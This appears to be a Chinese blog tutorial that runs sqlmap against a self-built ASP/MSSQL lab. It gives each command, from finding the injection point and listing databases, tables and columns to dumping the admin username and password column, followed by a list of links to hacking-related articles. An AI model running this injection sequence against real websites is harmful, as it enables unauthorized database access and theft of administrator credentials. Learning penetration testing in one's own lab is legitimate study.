今天搭建了一个asp+mssql数据库的环境用于安全测试学习
1.判断注入点及获取网站信息:
sqlmap -u http://192.168.1.30/1/onews.asp?id=8
文章插图
web server operating system: windows 2003 or XP
web Application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
2.获取所有数据库:
sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --dbs
文章插图
网站用的数据库是这个sqlZR
3.获取网站当前使用的数据库:
【实战黑客sqlmap渗透攻击mssql数据库最新教程】sqlmap -u http://192.168.1.30/1/onews.asp?id=8 --current-db
文章插图
4.获取数据库中的表名:
sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR --tables
文章插图
5.获取数据表中的字段名:sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T Admin --columns
文章插图
6.获取字段中的内容
sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T admin -C "admin,password" --dump
文章插图
看到了吧,几条命名就把管理员的账号密码给跑出来了 。
推荐阅读
- 带你了解黑客使用的命令行浏览器,令人吃惊
- 二 ThinkPHP6开发博客实战入门,ThinkPHP6的安装与配置
- 当服务器被黑客攻击时,教你如何查找溯源
- 小心!黑客以假凭证过期通知散布恶意程序
- MySQL架构之MHA架构实战
- 2019年最受欢迎的20款黑客工具盘点
- Docker 基础与实战,看这一篇就够了
- 黑客手中利器nmap扫描器,轻而易举发现漏洞
- 2019年最受欢迎的20款黑客工具盘点!
- 网络安全:这十招可帮助你的网络远离黑客